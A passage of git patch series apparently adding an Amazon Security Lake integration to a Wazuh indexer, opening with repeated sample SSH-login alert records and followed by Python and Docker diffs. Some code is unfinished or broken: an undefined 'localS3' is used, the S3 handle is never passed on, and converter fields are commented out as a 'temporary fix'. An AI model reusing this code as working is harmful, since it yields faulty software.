SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} +{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} +{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} +{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index eee82036c3ff5..51f1ab81cb9c6 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -1,4 +1,4 @@ -#!/home/fede/src/wazuh-indexer/integrations/amazon-security-lake/venv/bin/python3 +#!/env/bin/python3 import os import sys diff --git a/integrations/amazon-security-lake/transform/__init__.py b/integrations/amazon-security-lake/transform/__init__.py old mode 100644 new mode 100755 diff --git a/integrations/amazon-security-lake/transform/converter.py b/integrations/amazon-security-lake/transform/converter.py old mode 100644 new mode 100755 diff --git a/integrations/amazon-security-lake/transform/models/__init__.py b/integrations/amazon-security-lake/transform/models/__init__.py old mode 100644 new mode 100755 diff --git a/integrations/amazon-security-lake/transform/models/ocsf.py b/integrations/amazon-security-lake/transform/models/ocsf.py old mode 100644 new mode 100755 diff --git a/integrations/amazon-security-lake/transform/models/wazuh.py b/integrations/amazon-security-lake/transform/models/wazuh.py old mode 100644 new mode 100755 diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index a8735de543b4d..28d925f97a34e 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -89,6 +89,8 @@ services: volumes: - ../amazon-security-lake/logstash/pipeline:/usr/share/logstash/pipeline - ./certs/root-ca.pem:/usr/share/logstash/root-ca.pem + - ../amazon-security-lake/stdin_to_securitylake.py:/usr/share/logstash/bin/run.py + - ../amazon-security-lake/transform/:/usr/share/logstash/bin/transform/ #command: tail -f /dev/null command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash --config.reload.automatic From b9b21a83d1a6431ff8add5eb7c244a2c2a552fd9 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 27 Feb 2024 11:27:37 -0300 Subject: [PATCH 69/77] Temporary fix on ocsf class for testing purposes --- integrations/amazon-security-lake/ocsf/converter.py | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py index c927afa8fe87f..161012475cb14 100644 --- a/integrations/amazon-security-lake/ocsf/converter.py +++ b/integrations/amazon-security-lake/ocsf/converter.py @@ -27,12 +27,12 @@ def convert(event: dict) -> dict: "category_uid": 2, "class_name": "Detection Finding", "class_uid": 2004, - "count": event["_source"]["rule"]["firedtimes"], + #"count": event["_source"]["rule"]["firedtimes"], "message": event["_source"]["rule"]["description"], "finding_info": { "analytic": { "category": join(event["_source"]["rule"]["groups"]), - "name": event["_source"]["decoder"]["name"], + #"name": event["_source"]["decoder"]["name"], "type_id": 1, "uid": event["_source"]["rule"]["id"], }, @@ -50,7 +50,8 @@ def convert(event: dict) -> dict: }, "title": event["_source"]["rule"]["description"], "types": [ - event["_source"]["input"]["type"] + #event["_source"]["input"]["type"] + 0 ], "uid": event["_source"]['id'] }, From 81ecb7c57e1ed97f9437824a5468a7d4c275682d Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 27 Feb 2024 11:28:44 -0300 Subject: [PATCH 70/77] Add function to handle local s3 buckets --- .../stdin_to_securitylake.py | 30 +++++++++++++++++-- 1 file changed, 28 insertions(+), 2 deletions(-) diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index 51f1ab81cb9c6..f6931bcc51eb1 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -7,15 +7,36 @@ import time import json import datetime -from pyarrow import parquet, Table +import boto3 +from pyarrow import parquet, Table, fs from ocsf import converter block_ending = { "block_ending": True } + +def s3authenticate(profile, endpoint=None, scheme='https'): + session = boto3.session.Session(profile_name=profile) + credentials = session.get_credentials() + + if endpoint != None: + scheme='http' + + s3fs = fs.S3FileSystem( + endpoint_override=endpoint, + access_key=credentials.access_key, + secret_key=credentials.secret_key, + scheme=scheme) + + return s3fs + + + + + def encode_parquet(list,foldername,filename): try: table = Table.from_pylist(list) - parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) + parquet.write_table(table, '{}.parquet'.format(filename), filesystem=localS3) except Exception as e: logging.error(e) raise @@ -41,11 +62,13 @@ def get_elapsedseconds(reference_timestamp): date = datetime.datetime.now(datetime.timezone.utc).strftime('%F_%H.%M.%S') parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') + parser.add_argument('-e','--s3endpoint', type=str, action='store', default=None, help='Hostname and port of the S3 destination (defaults to AWS\')') parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake') parser.add_argument('-n','--linebuffer', type=int, action='store', default=100, help='stdin line buffer length') parser.add_argument('-o','--outputfolder', type=str, action='store', help='Folder or S3 bucket URL to dump parquet files to') + parser.add_argument('-p','--s3profile', type=str, action='store', default='default', help='AWS profile as stored in credentials file') parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval') args = parser.parse_args() #logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG) @@ -74,6 +97,7 @@ def get_elapsedseconds(reference_timestamp): if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: logging.info('Writing data to parquet file') + s3fs = s3authenticate(args.s3profile,args.s3endpoint) encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date)) starttimestamp = datetime.datetime.now(datetime.timezone.utc) output_buffer = [] @@ -88,3 +112,5 @@ def get_elapsedseconds(reference_timestamp): logging.error("Error running script") logging.error(e) raise + + From f4a733615d05e104168458dc4c588c08862269e2 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 27 Feb 2024 14:07:57 -0300 Subject: [PATCH 71/77] Allow to set the bucket name from the cli --- .../pipeline/indexer-to-integrator.conf | 19 ++++++++++--------- .../stdin_to_securitylake.py | 12 ++++-------- 2 files changed, 14 insertions(+), 17 deletions(-) diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf index 50e3ec8300674..072022f6d076a 100644 --- a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf +++ 